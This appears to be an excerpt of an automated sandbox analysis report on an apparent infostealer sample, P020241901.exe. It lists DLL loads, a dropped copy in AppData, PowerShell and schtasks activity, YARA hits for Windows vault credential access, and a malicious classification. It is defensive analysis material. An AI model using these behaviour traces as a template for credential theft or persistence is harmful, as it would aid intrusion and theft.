                      Source: P020241901.exe, 00000000.00000002.2001137973.00000000025CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename9bd5bdf1-67e0-44ac-acb3-9f26dbc64b5d.exe4 vs P020241901.exe
                      Source: P020241901.exe, 00000000.00000002.2019464746.0000000007268000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekugJ.exe< vs P020241901.exe
                      Source: P020241901.exe, 00000000.00000002.2002617637.00000000038E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs P020241901.exe
                      Source: P020241901.exe, 00000009.00000002.3231223568.0000000000959000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs P020241901.exe
                      Source: P020241901.exeBinary or memory string: OriginalFilenamekugJ.exe< vs P020241901.exe
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: msv1_0.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: ntlmshared.dll
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeSection loaded: cryptdll.dll
                      Source: P020241901.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 14.2.VKkzqGUhsZwwm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.P020241901.exe.3799000.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.P020241901.exe.375e5e0.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.P020241901.exe.375e5e0.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.P020241901.exe.3799000.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: P020241901.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: VKkzqGUhsZwwm.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.P020241901.exe.3799000.10.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.P020241901.exe.3799000.10.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.P020241901.exe.3799000.10.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.P020241901.exe.3799000.10.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.P020241901.exe.3799000.10.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.P020241901.exe.3799000.10.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.P020241901.exe.3799000.10.raw.unpack, fpnV0Qjz.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.P020241901.exe.3799000.10.raw.unpack, fpnV0Qjz.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, zcoFxPGFG5DVnMwYGR.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, zcoFxPGFG5DVnMwYGR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, zcoFxPGFG5DVnMwYGR.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, Mon41UfUXZQosr60DT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, zcoFxPGFG5DVnMwYGR.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, zcoFxPGFG5DVnMwYGR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, zcoFxPGFG5DVnMwYGR.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, Mon41UfUXZQosr60DT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@2/1
                      Source: C:\Users\user\Desktop\P020241901.exeFile created: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5424:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
                      Source: C:\Users\user\Desktop\P020241901.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF9C9.tmpJump to behavior
                      Source: P020241901.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: P020241901.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
